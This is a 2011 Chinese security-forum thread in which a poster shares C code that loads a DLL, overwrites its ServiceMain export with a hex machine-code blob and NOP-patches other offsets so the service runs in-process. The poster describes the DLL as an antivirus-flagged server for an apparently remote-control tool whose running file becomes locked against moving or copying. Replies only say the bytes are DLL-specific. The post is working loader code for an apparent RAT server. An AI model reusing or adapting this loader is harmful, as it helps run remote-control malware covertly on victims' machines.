首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 付费问答
    3. 发新帖
[旧帖] [讨论]动态调用ServiceMain函数,有例子,求解释。 0.00雪花
发表于: 2011-8-19 13:42 1588

[旧帖] [讨论]动态调用ServiceMain函数,有例子,求解释。 0.00雪花

游乐娃子 活跃值
2011-8-19 13:42
1588
ServiceMain为服务入口函数,是一个导出函数,一般都不能动态调用的。
下面是一个动态调用ServiceMain的源码,不知道为什么,只对一个DLL有效,套用到其他程序中就无法调用成功。下面贴代码:
char Ecode[302]={
	0x55,0x8B,0xEC,0x6A,0xFF,0x68,0x08,0x99,0x01,0x20,0x64,0xA1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x81,0xEC,0xC8,0x04,0x00,0x00,0x53,0x56
	,0x89,0x75,0xEC,0xE8,0x48,0x51,0x00,0x00,0x8B,0x75,0x0C,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
	,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x8B,0x15,0xA4,0x2A,0x02,0x20,0x68,0x90,0x41,0x02,0x20,0x8D,0x85,0x2C,0xFB
	,0xFF,0xFF,0x52,0x50,0xFF,0x15,0x00,0xA5,0x01,0x20,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
	,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x83,0xC4,0x44,0xA3,0x5C,0x40,0x02,0x20,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
	,0x90,0x90,0x90,0x90,0x68,0x90,0x41,0x02,0x20,0xA3,0x64,0x40,0x02,0x20,0xFF,0x15,0x28,0xA3,0x01,0x20,0x6A,0x00,0xE8,0xC4,0xDA,0xFF,0xFF,0x83,0xC4,0x08,0x84,0xC0
	,0x74,0x52,0xBB,0x01,0x00,0x00,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xA1,0x88,0x41,0x02
	,0x20,0x83,0xC4,0x18,0x85,0xC0,0x74,0x3E,0x8B,0x35,0xF8,0xA2,0x01,0x20,0x6A,0x64,0xFF,0xD6,0xA1,0x6C,0x40,0x02,0x20,0x83,0xF8,0x03,0x74,0x04,0x3B,0xC3,0x75,0xEE
	,0x6A,0x00,0x6A,0x00,0x53,0xE8,0x36,0xAB,0xFF,0xFF,0x83,0xC4,0x0C,0x68,0xB8,0x0B,0x00,0x00,0xFF,0xD6,0x8B,0x4D,0xF4,0x5E,0x5B,0x64,0x89,0x0D,0x00,0x00,0x00,0x00
	,0x8B,0xE5,0x5D,0xC2,0x08,0x00,0x8B,0x45,0x08,0x57,0x3B,0xC3,0xEB,0x55
};
char c4F35[5]={0xE9,0x13,0x04,0x00,0x00};
char c5351[6]={0x90,0x90,0x90,0x90,0x90,0x90};
char c14766[10]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};

DWORD WINAPI loadDll(LPVOID lpParamter)
{
	
	void (WINAPI *run)();
	(FARPROC&)run=GetProcAddress(LoadLibrary("1023.dll"),"YJSOFT");
	char*bd=(char*)(run);//函数入口,内存地址20007b10
        //下面这几个我猜测是ServiceHandler,TellSCM函数,具体哪个是哪个不知道,只是猜测的
	char*bd1=bd-0x2bdb;//内存地址20004f35
	char*bd2=bd-0x27bf;//内存地址20005351
	char*bd3=bd+0xcc56;//内存地址20014766
	memcpy((void*)(run),(void*)(Ecode),302);
	memcpy((void*)(bd1),(void*)(c4F35),5);
	memcpy((void*)(bd2),(void*)(c5351),6);
	memcpy((void*)(bd3),(void*)(c14766),10);
	run();	
	while(1)
		Sleep(11111);
	return 0;
}


调用loadDll就可以运行1023.dll的YJSOFT(ServiceMain)函数了。
在这里不明白的是,为什么只对单独一个DLL的ServiceMain函数有效。
是不是这个DLL的ServiceMain做了什么修改,还是因为Ecode,c4F35,c5351,c14766的值对不同的DLL不凑效?

Ecode,c4F35,c5351,c14766中都是16进制,这个应该是汇编中的指令么,汇编一直很弱的我,一直看不懂这些16进制代表什么。

如果用着段代码给自己写的一个DLL进行动态调用ServiceMain,我需要修改的是DLL,还是代码中的变量,具体要怎么修改。

很诚恳的请求高手对上面的代码进行详解,感激不尽啊!!

最后附上该代码中调用到的DLL文件,此文件为白金的服务端DLL,被杀软查杀。
纯净服务端,无配置,人格保证没有后门。放心测试。
动态调用该DLL的ServiceMain后,程序处于占坑状态,无法移动,复制。

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

上传的附件:
收藏
免费 0
支持
分享
最新回复 (5)
yarpee
雪    币: 343
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
私信
2
调试or反下YJSOFT的实现就知道shellcode在干嘛了~等结果~
2011-8-19 15:07
0
zccz
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
这些还真是不清楚 需要多学习和了解啊
2011-8-19 16:10
0
liudaogeng
雪    币: 28
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
char Ecode[302]={
  0x55,0x8B,0xEC,0x6A,0xFF,0x68,0x08,0x99,0x01,0x20,0x64,0xA1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x81,0xEC,0xC8,0x04,0x00char c4F35[5]={0xE9,0x13,0x04,0x00,0x00};
char c5351[6]={0x90,0x90,0x90,0x90,0x90,0x90};
char c14766[10]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
这些CHAR就是声明的函数定义,是DLL的16进制代码,如果你想换DLL这个些代码都要换掉
2011-8-19 17:37
0
游乐娃子
雪    币: 7498
活跃值: (5327)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
5
4楼
具体怎么替换,求详解。我也是卡再这里。
2011-8-19 19:01
0
游乐娃子
雪    币: 7498
活跃值: (5327)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
6
2楼
期待2楼的结果。
2011-8-19 19:06
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//